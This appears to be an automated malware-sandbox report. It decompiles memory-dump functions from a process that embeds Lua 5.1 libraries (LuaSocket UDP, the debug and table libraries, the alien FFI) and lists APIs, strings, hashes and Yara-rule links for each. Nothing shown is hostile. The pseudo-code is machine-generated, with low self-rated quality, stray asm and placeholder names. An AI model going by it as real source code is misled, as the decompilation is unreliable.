						if(_t24 == 0) {
							_push(1);
							if( *((intOrPtr*)(_t29 + 0x14)) == 0) {
								_push("udp{unconnected}");
							} else {
								_push("udp{connected}");
							}
							_push(_t22);
							E009912A0();
							_push(0x3ff00000);
							_push(0);
							_push(_t22);
							L00994B5A();
							return 1;
						} else {
							_push(_t22);
							L00994B4E();
							_push(_t24);
							_push(_t22);
							L00994AD0();
							return 2;
						}
					}
					_t21 =  *((intOrPtr*)(_t9 + 1));
					_t19 = _t21;
					_t3 =  &(_t23[1]); // 0x25000000
					if(_t21 !=  *_t3) {
						break;
					}
					_t9 = _t9 + 2;
					_t23 =  &(_t23[2]);
					if(_t19 != 0) {
						continue;
					}
					goto L5;
				}
				asm("sbb eax, eax");
				asm("sbb eax, 0xffffffff");
				 *((intOrPtr*)(_t27 + 0x14)) = _t9;
				goto L7;
			}

0x00993d50
0x00993d54
0x00993d60
0x00993d65
0x00993d67
0x00993d69
0x00993d6a
0x00993d6c
0x00993d71
0x00993d74
0x00993d76
0x00993d7b
0x00993d7b
0x00993d7d
0x00993d81
0x00000000
0x00000000
0x00993d85
0x00993d9b
0x00993d9b
0x00993dae
0x00993dae
0x00993db4
0x00993dc3
0x00993dc5
0x00993dc7
0x00993dc9
0x00993dca
0x00993dcf
0x00993db6
0x00993db6
0x00993db8
0x00993db9
0x00993dbe
0x00993dbe
0x00993dd2
0x00993dd7
0x00993de3
0x00993de5
0x00993dea
0x00993e0a
0x00993e0e
0x00993e17
0x00993e10
0x00993e10
0x00993e10
0x00993e1c
0x00993e1d
0x00993e25
0x00993e2a
0x00993e2c
0x00993e2d
0x00993e3e
0x00993dec
0x00993dec
0x00993ded
0x00993df2
0x00993df3
0x00993df4
0x00993e05
0x00993e05
0x00993dea
0x00993d87
0x00993d8a
0x00993d8c
0x00993d8f
0x00000000
0x00000000
0x00993d91
0x00993d94
0x00993d99
0x00000000
0x00000000
0x00000000
0x00993d99
0x00993da5
0x00993da7
0x00993daa
0x00000000

APIs

Part of subcall function 00991250: sprintf.MSVCRT ref: 0099127F
Part of subcall function 00991250: luaL_argerror.LUA5.1(?,?,?), ref: 0099128C

luaL_checklstring.LUA5.1(?,00000002,00000000,?,udp{any},00000001), ref: 00993D6C
luaL_checknumber.LUA5.1(?,00000003), ref: 00993DB9
luaL_optnumber.LUA5.1(?,00000003,00000000,00000000), ref: 00993DCA
_ftol.MSVCRT ref: 00993DD2
lua_pushnil.LUA5.1(?), ref: 00993DED
lua_pushstring.LUA5.1(?,00000000,?), ref: 00993DF4
lua_pushnumber.LUA5.1(?,00000000,3FF00000), ref: 00993E2D

Strings

udp{connected}, xrefs: 00993E10
udp{any}, xrefs: 00993D5A
udp{unconnected}, xrefs: 00993E17

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_checklstring.L_checknumber.L_optnumber._ftollua_pushnil.lua_pushnumber.lua_pushstring.sprintf
String ID: udp{any}$udp{connected}$udp{unconnected}
API String ID: 2423230677-672493207
Opcode ID: 175c3280e7744d10c39fa327a9f0dbd49bb02312f31d4cf2889d470b550b31ee
Instruction ID: ee0ddd406545828df7329c34804cffab2c48566177dde535f62fb5f33f019e63
Opcode Fuzzy Hash: 175c3280e7744d10c39fa327a9f0dbd49bb02312f31d4cf2889d470b550b31ee
Instruction Fuzzy Hash: 70212962A4420037EF216E6C6C93F7F779D8FD2B54F044464F944AB2C2E6468E0542A6

Uniqueness

Uniqueness Score: -1.00%

Function 00993B10, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 90
networkCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00993B10(void* __ecx, void* __eflags, long long __fp0, char _a4, char _a8, intOrPtr _a10, char _a12, signed int _a16, char _a28, intOrPtr _a8224) {
				signed int _v8;
				void* _t15;
				void* _t19;
				signed int _t22;
				void* _t25;
				intOrPtr _t32;
				void* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				long long _t50;

				_t50 = __fp0;
				E00994BE0(0x201c, __ecx);
				_t32 = _a8224;
				_t15 = E00991200(_t32, "udp{unconnected}", 1);
				_push(0x40c00000);
				_push(0);
				_push(2);
				_push(_t32);
				_t25 = _t15;
				_a4 = 0x10;
				L00994B72();
				L00994BD0();
				_t3 = _t25 + 8; // 0x8
				_t35 = _t3;
				_t33 = _t15;
				E00992DC0(__fp0, _t35);
				_t37 = _t36 + 0x20;
				if(_t15 >= 0x2000) {
					_t33 = 0x2000;
				}
				_push(_t35);
				_t19 = E009945A0(_t25,  &_a28, _t33,  &_a8,  &_a12,  &_a4);
				_t34 = _t19;
				_t38 = _t37 + 0x1c;
				if(_t19 != 0) {
					_push(_t32);
					L00994B4E();
					_push(E00993860(_t34));
					_push(_t32);
					L00994AD0();
					return 2;
				} else {
					_push(_a8);
					_push( &_a28);
					_push(_t32);
					L00994BC6();
					_t22 = _a16;
					_push(_t22);
					L00994A10();
					_push(_t22);
					_push(_t32);
					L00994AD0();
					_push(_a10);
					L00994A1C();
					_v8 = _t22 & 0x0000ffff;
					asm("fild dword [esp+0x18]");
					 *((long long*)(_t38 + 0x14 - 8)) = _t50;
					_push(_t32);
					L00994B5A();
					return 3;
				}
			}

0x00993b10
0x00993b15
0x00993b1e
0x00993b2d
0x00993b32
0x00993b37
0x00993b39
0x00993b3b
0x00993b3c
0x00993b3e
0x00993b46
0x00993b4b
0x00993b50
0x00993b50
0x00993b53
0x00993b56
0x00993b5b
0x00993b64
0x00993b66
0x00993b66
0x00993b6f
0x00993b82
0x00993b87
0x00993b89
0x00993b8e
0x00993bed
0x00993bee
0x00993bf9
0x00993bfa
0x00993bfb
0x00993c12
0x00993b90
0x00993b98
0x00993b99
0x00993b9a
0x00993b9b
0x00993ba0
0x00993ba7
0x00993ba8
0x00993bad
0x00993bae
0x00993baf
0x00993bbb
0x00993bbc
0x00993bc9
0x00993bcd
0x00993bd1
0x00993bd4
0x00993bd5
0x00993bec
0x00993bec

APIs

Part of subcall function 00991200: sprintf.MSVCRT ref: 0099122F
Part of subcall function 00991200: luaL_argerror.LUA5.1(?,?,?), ref: 0099123C

luaL_optnumber.LUA5.1(?,?,?,00000002,00000000,40C00000,?,udp{unconnected},00000001), ref: 00993B46
_ftol.MSVCRT ref: 00993B4B
lua_pushlstring.LUA5.1(?,?,?), ref: 00993B9B
inet_ntoa.WSOCK32(?), ref: 00993BA8
lua_pushstring.LUA5.1(?,00000000,?), ref: 00993BAF
htons.WSOCK32(?), ref: 00993BBC
lua_pushnumber.LUA5.1(?,?,?,?,?), ref: 00993BD5
lua_pushnil.LUA5.1(?), ref: 00993BEE
lua_pushstring.LUA5.1(?,00000000,00000000,?), ref: 00993BFB

Strings

udp{unconnected}, xrefs: 00993B27

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushstring.$L_argerror.L_optnumber._ftolhtonsinet_ntoalua_pushlstring.lua_pushnil.lua_pushnumber.sprintf
String ID: udp{unconnected}
API String ID: 2724925158-754074627
Opcode ID: 92491b89d9893e812ed963da31e67a1f3acc837fe175b48452e41c9472f3ebd7
Instruction ID: f18b20f60b309423a92c435715ec45b8ffc2672bcbd7deccb751d9b6dd3c7255
Opcode Fuzzy Hash: 92491b89d9893e812ed963da31e67a1f3acc837fe175b48452e41c9472f3ebd7
Instruction Fuzzy Hash: 3B21D3725442006BEB11BA6CEC82F7F73ACDFD4718F04052DF844A6143E669EA1A82F7

Uniqueness

Uniqueness Score: -1.00%

Function 100116C0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100116C0(void* __eflags, void* __fp0, char _a4) {
				char _v100;
				void* __ebx;
				void* __esi;
				void* _t23;
				void* _t24;

				_t32 = _a4;
				_t31 = E10011630(__eflags, _a4,  &_a4);
				if(E10003F40(_t9, E1000F5C0(__eflags, __fp0, _a4, _a4 + 1),  &_v100) != 0) {
					_t27 = _a4 + 2;
					_t24 = E10003FC0(__eflags, _t31,  &_v100, E1000F5C0(__eflags, __fp0, _t32, _a4 + 2));
					__eflags = _t24;
					if(_t24 == 0) {
						E100018C0(_t32);
						return 1;
					} else {
						E10001090(_t31, _t32, 1);
						E10001980(_t27, _t32, _t24);
						E100013D0(__eflags, _t32, 0xfffffffe);
						return 2;
					}
				} else {
					return E1000F090(_t23, _t32, _a4 + 1, _t32, _a4 + 1, "level out of range");
				}
			}

0x100116c9
0x100116e4
0x100116fa
0x1001171b
0x10011731
0x10011736
0x10011738
0x10011762
0x10011775
0x1001173a
0x1001173e
0x10011745
0x1001174d
0x10011760
0x10011760
0x100116fc
0x10011716
0x10011716

APIs

Part of subcall function 10011630: lua_type.LUA5.1(?,00000001,?,100113D5,?,?), ref: 10011638
Part of subcall function 10011630: lua_tothread.LUA5.1(?,00000001), ref: 10011652

luaL_checkinteger.LUA5.1(?,?,?), ref: 100116E6

Part of subcall function 1000F5C0: lua_tointeger.LUA5.1(?,?), ref: 1000F5CD
Part of subcall function 1000F5C0: lua_isnumber.LUA5.1(?,?), ref: 1000F5DD

lua_getstack.LUA5.1(00000000,00000000,?,?), ref: 100116F0
luaL_argerror.LUA5.1(?,?,level out of range,?,?,?,?,?), ref: 10011708

Part of subcall function 1000F090: lua_getstack.LUA5.1(?,00000000), ref: 1000F0A0
Part of subcall function 1000F090: luaL_error.LUA5.1(?,bad argument #%d (%s),?,?), ref: 1000F0BC

luaL_checkinteger.LUA5.1(?,?,?,?,?,?,?), ref: 10011720
lua_getlocal.LUA5.1(00000000,?,00000000,?,?,?,?,?,?,?), ref: 1001172C
lua_xmove.LUA5.1(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?), ref: 1001173E
lua_pushstring.LUA5.1(?,00000000,00000000,?,00000001,?,?,?,?,?,?,?,?,?,?), ref: 10011745
lua_pushvalue.LUA5.1(?,000000FE,?,00000000,00000000,?,00000001), ref: 1001174D

Strings

level out of range, xrefs: 10011700

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checkinteger.lua_getstack.$L_argerror.L_error.lua_getlocal.lua_isnumber.lua_pushstring.lua_pushvalue.lua_tointeger.lua_tothread.lua_type.lua_xmove.
String ID: level out of range
API String ID: 2608758037-3896408274
Opcode ID: 5e1a2b47238a3badac7319429cddb2ecc76e0b7e78fd51cb1697e6d0cec73378
Instruction ID: 381e90b1d6a42875e15b4844c8a3af571ba6a7fb6b8853f4b1c80deb7139396d
Opcode Fuzzy Hash: 5e1a2b47238a3badac7319429cddb2ecc76e0b7e78fd51cb1697e6d0cec73378
Instruction Fuzzy Hash: 561106AA9006103BF110D624AC82DFF639CDFC11A4F444039FE1586246FA69FE4A42F7

Uniqueness

Uniqueness Score: -1.00%

Function 10013E80, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E10013E80(void* __ebx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void* _t5;
				void* _t6;
				void* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;

				_t31 = __fp0;
				_t16 = __ebx;
				_t19 = _a4;
				E1000F410(__ebx, __eflags, _t19, 1, 5);
				_t21 = E10001770(__ebx, __eflags, _t19, 1) + 1;
				_t5 = E10001150(_t19);
				_t24 = _t23 + 0x18;
				_t6 = _t5 - 2;
				if(_t6 == 0) {
					_t22 = _t21;
					goto L10;
				} else {
					if(_t6 == 1) {
						_t22 = E1000F5C0(__eflags, __fp0, _t19, 2);
						_t24 = _t24 + 8;
						__eflags = _t21 - _t22;
						if(__eflags < 0) {
							_t21 = _t22;
							__eflags = _t21 - _t22;
						}
						if(__eflags <= 0) {
							L10:
							E10001EB0(__eflags, _t19, 1, _t22);
							__eflags = 0;
							return 0;
						} else {
							_push(_t16);
							do {
								_t2 = _t21 - 1; // 0x0
								_t17 = _t2;
								E10001C30(__eflags, _t31, _t19, 1, _t17);
								E10001EB0(__eflags, _t19, 1, _t21);
								_t21 = _t17;
								_t24 = _t24 + 0x18;
								__eflags = _t21 - _t22;
							} while (__eflags > 0);
							E10001EB0(__eflags, _t19, 1, _t22);
							__eflags = 0;
							return 0;
						}
					} else {
						_push("wrong number of arguments to \'insert\'");
						_push(_t19);
						return E1000F230();
					}
				}
			}

0x10013e80
0x10013e80
0x10013e83
0x10013e8c
0x10013e9c
0x10013e9d
0x10013ea2
0x10013ea5
0x10013ea8
0x10013f08
0x00000000
0x10013eaa
0x10013eab
0x10013ec7
0x10013ec9
0x10013ecc
0x10013ece
0x10013ed0
0x10013ed2
0x10013ed2
0x10013ed4
0x10013f0a
0x10013f0e
0x10013f16
0x10013f1b
0x10013ed6
0x10013ed6
0x10013ed7
0x10013ed7
0x10013ed7
0x10013ede
0x10013ee7
0x10013eec
0x10013eee
0x10013ef1
0x10013ef1
0x10013efa
0x10013f02
0x10013f07
0x10013f07
0x10013ead
0x10013ead
0x10013eb2
0x10013ebe
0x10013ebe
0x10013eab

APIs

luaL_checktype.LUA5.1(?,00000001,00000005), ref: 10013E8C

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

lua_objlen.LUA5.1(?,00000001,?,00000001,00000005), ref: 10013E94
lua_gettop.LUA5.1(?,?,00000001,?,00000001,00000005), ref: 10013E9D
luaL_error.LUA5.1(?,wrong number of arguments to 'insert'), ref: 10013EB3

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

luaL_checkinteger.LUA5.1(?,00000002), ref: 10013EC2
lua_rawgeti.LUA5.1(?,00000001,00000000), ref: 10013EDE
lua_rawseti.LUA5.1(?,00000001,00000001,?,00000001,00000000), ref: 10013EE7
lua_rawseti.LUA5.1(?,00000001,00000000), ref: 10013EFA
lua_rawseti.LUA5.1(?,00000001,00000001), ref: 10013F0E

Strings

wrong number of arguments to 'insert', xrefs: 10013EAD

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_rawseti.$L_checkinteger.L_checktype.L_error.L_where.lua_concat.lua_error.lua_gettop.lua_objlen.lua_pushvfstring.lua_rawgeti.lua_type.
String ID: wrong number of arguments to 'insert'
API String ID: 732831627-1213844428
Opcode ID: babfc1ac738a3cdc84a52cf039d2c240dbb54cbc6ad9001e5e08347418e4aa08
Instruction ID: 074b530034f39994ddb9da936b4ab75bbb6c7cf2d0d8e315fa162ed4f4025042
Opcode Fuzzy Hash: babfc1ac738a3cdc84a52cf039d2c240dbb54cbc6ad9001e5e08347418e4aa08
Instruction Fuzzy Hash: A6012B3BA5421832F521E1942CC3FFF666DC7C2AE4F050129FA0869183E197B89610F2

Uniqueness

Uniqueness Score: -1.00%

Function 10011780, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10011780(void* __ebx, void* __eflags, void* __fp0, char _a4) {
				char _v100;
				void* __esi;

				_t36 = _a4;
				_t35 = E10011630(__eflags, _a4,  &_a4);
				if(E10003F40(_t11, E1000F5C0(__eflags, __fp0, _a4, _a4 + 1),  &_v100) != 0) {
					E1000F470(__ebx, __eflags, _t36, _a4 + 3);
					E10001160(_t36, _a4 + 3);
					E10001090(_t36, _t35, 1);
					__eflags = _a4 + 2;
					E10001980( &_v100, _t36, E100040D0(__eflags, _t35,  &_v100, E1000F5C0(__eflags, __fp0, _t36, _a4 + 2)));
					return 1;
				} else {
					return E1000F090(__ebx, _t36, _a4 + 1, _t36, _a4 + 1, "level out of range");
				}
			}

0x10011788
0x100117a3
0x100117b9
0x100117de
0x100117ec
0x100117f5
0x10011801
0x10011819
0x1001182b
0x100117bb
0x100117d4
0x100117d4

APIs

Part of subcall function 10011630: lua_type.LUA5.1(?,00000001,?,100113D5,?,?), ref: 10011638
Part of subcall function 10011630: lua_tothread.LUA5.1(?,00000001), ref: 10011652

luaL_checkinteger.LUA5.1(?,?,?), ref: 100117A5

Part of subcall function 1000F5C0: lua_tointeger.LUA5.1(?,?), ref: 1000F5CD
Part of subcall function 1000F5C0: lua_isnumber.LUA5.1(?,?), ref: 1000F5DD

lua_getstack.LUA5.1(00000000,00000000,?,?), ref: 100117AF
luaL_argerror.LUA5.1(?,?,level out of range,?,?,?,?,?), ref: 100117C7

Part of subcall function 1000F090: lua_getstack.LUA5.1(?,00000000), ref: 1000F0A0
Part of subcall function 1000F090: luaL_error.LUA5.1(?,bad argument #%d (%s),?,?), ref: 1000F0BC

luaL_checkany.LUA5.1(?,?,?,?,?,?,?), ref: 100117DE
lua_settop.LUA5.1(?,?,?,?,?,?,?,?,?), ref: 100117EC
lua_xmove.LUA5.1(?,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 100117F5
luaL_checkinteger.LUA5.1(?,?,?,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 10011806
lua_setlocal.LUA5.1(00000000,?,00000000,?,?,?,00000000,00000001,?,?,?,?), ref: 10011812
lua_pushstring.LUA5.1(?,00000000,00000000,?,00000000,?,?,?,00000000,00000001,?,?,?,?), ref: 10011819

Strings

level out of range, xrefs: 100117BF

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checkinteger.lua_getstack.$L_argerror.L_checkany.L_error.lua_isnumber.lua_pushstring.lua_setlocal.lua_settop.lua_tointeger.lua_tothread.lua_type.lua_xmove.
String ID: level out of range
API String ID: 3965284509-3896408274
Opcode ID: 9fcaa8b921aeacf61ad39a977a0b5f1609dc0a46b803f34e7e18812ae632dbb4
Instruction ID: bc0ffc4c32b0a411cc0fdc4fa0933e261c824b818a0bd30102b62b43166d83a9
Opcode Fuzzy Hash: 9fcaa8b921aeacf61ad39a977a0b5f1609dc0a46b803f34e7e18812ae632dbb4
Instruction Fuzzy Hash: 7C118EB99046106BF115D624DC42EFF72ACDFC1288F444418FA849620AFA25BA5686F6

Uniqueness

Uniqueness Score: -1.00%

Function 10012160, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 55
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E10012160(intOrPtr* __eax, void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t23;

				__imp___errno();
				_t23 =  *__eax;
				if(_a8 == 0) {
					_t25 = _a4;
					E100018C0(_a4);
					_t20 = _a12;
					_push(_t23);
					if(_a12 == 0) {
						E100019F0(_t25, "%s", strerror());
						_push(_t23);
						E10001910(__fp0, _t25);
						return 3;
					} else {
						_push(strerror());
						E100019F0(_t25, "%s: %s", _t20);
						_push(_t23);
						E10001910(__fp0, _t25);
						return 3;
					}
				} else {
					E10001AE0(_a4, 1);
					return 1;
				}
			}

0x10012161
0x10012167
0x1001216f
0x10012189
0x1001218e
0x10012193
0x1001219c
0x1001219d
0x100121d5
0x100121dd
0x100121df
0x100121ef
0x1001219f
0x100121a5
0x100121ad
0x100121b5
0x100121b7
0x100121c7
0x100121c7
0x10012171
0x10012178
0x10012186
0x10012186

APIs

_errno.MSVCRT ref: 10012161
lua_pushboolean.LUA5.1(?,00000001), ref: 10012178
lua_pushnil.LUA5.1(?,00000000), ref: 1001218E
strerror.MSVCRT ref: 1001219F
lua_pushfstring.LUA5.1(?,%s: %s,?,00000000), ref: 100121AD
lua_pushinteger.LUA5.1(?,?), ref: 100121B7

Strings

%s: %s, xrefs: 100121A7

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: _errnolua_pushboolean.lua_pushfstring.lua_pushinteger.lua_pushnil.strerror
String ID: %s: %s
API String ID: 3794273909-3740598653
Opcode ID: bee44643437c32d351f559f2ba43925251a97b87d30b11f370ecee9c6bac59c2
Instruction ID: afab1c4a24ff316a08f6e58b05ad73f0f91fa1aced475a12d87bb044afd45eb3
Opcode Fuzzy Hash: bee44643437c32d351f559f2ba43925251a97b87d30b11f370ecee9c6bac59c2
Instruction Fuzzy Hash: 7A01A77AA042107BF601D658BC81EEF375CEF962D5F040428F50496207D635EA9543F3

Uniqueness

Uniqueness Score: -1.00%

Function 100108A0, Relevance: 17.5, APIs: 8, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E100108A0(void* __eflags, intOrPtr _a4, intOrPtr* _a12) {
				void* _t8;
				intOrPtr _t16;
				void* _t22;

				_t22 = __eflags;
				_t16 = _a4;
				E1000F3E0(_t16, 2, "too many nested functions");
				E100013D0(_t22, _t16, 1);
				E10002070(_t16, 0, 1);
				if(E10001410(_t22, _t16, 0xffffffff) != 0) {
					_t8 = E100014D0(__eflags, _t16, 0xffffffff);
					__eflags = _t8;
					if(_t8 == 0) {
						_push("reader function must return a string");
						_push(_t16);
						E1000F230();
						__eflags = 0;
						return 0;
					} else {
						E10001300(_t16, 3);
						return E100016F0(__eflags, _t16, 3, _a12);
					}
				} else {
					 *_a12 = 0;
					return 0;
				}
			}

0x100108a0
0x100108a1
0x100108ad
0x100108b5
0x100108bf
0x100108d1
0x100108e4
0x100108ec
0x100108ee
0x1001090a
0x1001090f
0x10010910
0x10010918
0x1001091b
0x100108f0
0x100108f3
0x10010909
0x10010909
0x100108d3
0x100108d8
0x100108e0
0x100108e0

APIs

luaL_checkstack.LUA5.1(?,00000002,too many nested functions), ref: 100108AD

Part of subcall function 1000F3E0: lua_checkstack.LUA5.1(?,?), ref: 1000F3EB
Part of subcall function 1000F3E0: luaL_error.LUA5.1(?,stack overflow (%s),?), ref: 1000F402

lua_pushvalue.LUA5.1(?,00000001,?,00000002,too many nested functions), ref: 100108B5
lua_call.LUA5.1(?,00000000,00000001,?,00000001,?,00000002,too many nested functions), ref: 100108BF
lua_type.LUA5.1(?,000000FF,?,00000000,00000001,?,00000001,?,00000002,too many nested functions), ref: 100108C7
lua_isstring.LUA5.1(?,000000FF), ref: 100108E4
lua_replace.LUA5.1(?,00000003), ref: 100108F3
lua_tolstring.LUA5.1(?,00000003,?,?,00000003), ref: 10010900

Strings

reader function must return a string, xrefs: 1001090A
too many nested functions, xrefs: 100108A5

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checkstack.L_error.lua_call.lua_checkstack.lua_isstring.lua_pushvalue.lua_replace.lua_tolstring.lua_type.
String ID: reader function must return a string$too many nested functions
API String ID: 2880153572-3802478608
Opcode ID: 2bc23842946f777d2b1a1682e7b537bff4408cdf5eb5fa10fd0738bf60105b41
Instruction ID: bbb1ffe3aeabec66677d161548f50ea3b6ce22c89ba9e82ec2acb4eaa8f7bde0
Opcode Fuzzy Hash: 2bc23842946f777d2b1a1682e7b537bff4408cdf5eb5fa10fd0738bf60105b41
Instruction Fuzzy Hash: 3CF09079A1962132F902E624BC03FCF2189CF027E5F040214F510AA1CBEB94BB8241EA

Uniqueness

Uniqueness Score: -1.00%

Function 00A23E60, Relevance: 17.5, APIs: 8, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00A23E60(void* __eflags, intOrPtr _a4) {
				void* __esi;
				intOrPtr* _t5;
				intOrPtr _t8;
				void* _t9;
				void* _t10;

				_t8 = _a4;
				E00A231A0(_t8);
				E00A23230(_t8);
				E00A23300(_t8);
				_t5 = E00A23DD0(_t8);
				_push("alien");
				_push(0xffffd8ee);
				_push(_t8);
				L00A23F02();
				_push(0xffffffff);
				_push(_t8);
				L00A23F4A();
				_t10 = _t9 + 0x14;
				if(_t5 == 0) {
					_push(_t5);
					_push(_t5);
					_push(_t8);
					L00A23FBC();
					_push(0xffffffff);
					_push(_t8);
					L00A23F44();
					_push("alien");
					_push(0xffffd8ee);
					_push(_t8);
					L00A23F3E();
					_t10 = _t10 + 0x20;
				}
				_push(0);
				_push(0);
				_push(_t8);
				L00A23FBC();
				_push(0xffffffff);
				_push(_t8);
				L00A23F44();
				_push("core");
				_push(0xfffffffd);
				_push(_t8);
				L00A23F3E();
				E00A23AD0(_t5, _t8);
				return 1;
			}

0x00a23e61
0x00a23e65
0x00a23e6a
0x00a23e6f
0x00a23e74
0x00a23e79
0x00a23e7e
0x00a23e83
0x00a23e84
0x00a23e89
0x00a23e8b
0x00a23e8c
0x00a23e91
0x00a23e96
0x00a23e98
0x00a23e99
0x00a23e9a
0x00a23e9b
0x00a23ea0
0x00a23ea2
0x00a23ea3
0x00a23ea8
0x00a23ead
0x00a23eb2
0x00a23eb3
0x00a23eb8
0x00a23eb8
0x00a23ebb
0x00a23ebd
0x00a23ebf
0x00a23ec0
0x00a23ec5
0x00a23ec7
0x00a23ec8
0x00a23ecd
0x00a23ed2
0x00a23ed4
0x00a23ed5
0x00a23edd
0x00a23ee8

APIs

Part of subcall function 00A231A0: luaL_newmetatable.LUA5.1(?,alien_library,00A23E6A), ref: 00A231A6
Part of subcall function 00A231A0: lua_pushlstring.LUA5.1(?,__gc,00000004,?,alien_library,00A23E6A), ref: 00A231B3
Part of subcall function 00A231A0: lua_pushcclosure.LUA5.1(?,00A22910,00000000,?,__gc,00000004,?,alien_library,00A23E6A), ref: 00A231C0
Part of subcall function 00A231A0: lua_settable.LUA5.1(?,000000FD,?,00A22910,00000000,?,__gc,00000004,?,alien_library,00A23E6A), ref: 00A231C8
Part of subcall function 00A231A0: lua_pushlstring.LUA5.1(?,__tostring,0000000A,?,000000FD,?,00A22910,00000000,?,__gc,00000004,?,alien_library,00A23E6A), ref: 00A231D5
Part of subcall function 00A231A0: lua_pushcclosure.LUA5.1(?,00A21470,00000000,?,__tostring,0000000A,?,000000FD,?,00A22910,00000000,?,__gc,00000004,?,alien_library), ref: 00A231E2
Part of subcall function 00A231A0: lua_settable.LUA5.1(?,000000FD), ref: 00A231ED
Part of subcall function 00A231A0: lua_pushlstring.LUA5.1(?,__index,00000007,?,000000FD), ref: 00A231FA
Part of subcall function 00A231A0: lua_createtable.LUA5.1(?,00000000,00000000,?,__index,00000007,?,000000FD), ref: 00A23204
Part of subcall function 00A231A0: lua_pushcclosure.LUA5.1(?,00A21310,00000001,?,00000000,00000000,?,__index,00000007,?,000000FD), ref: 00A23211
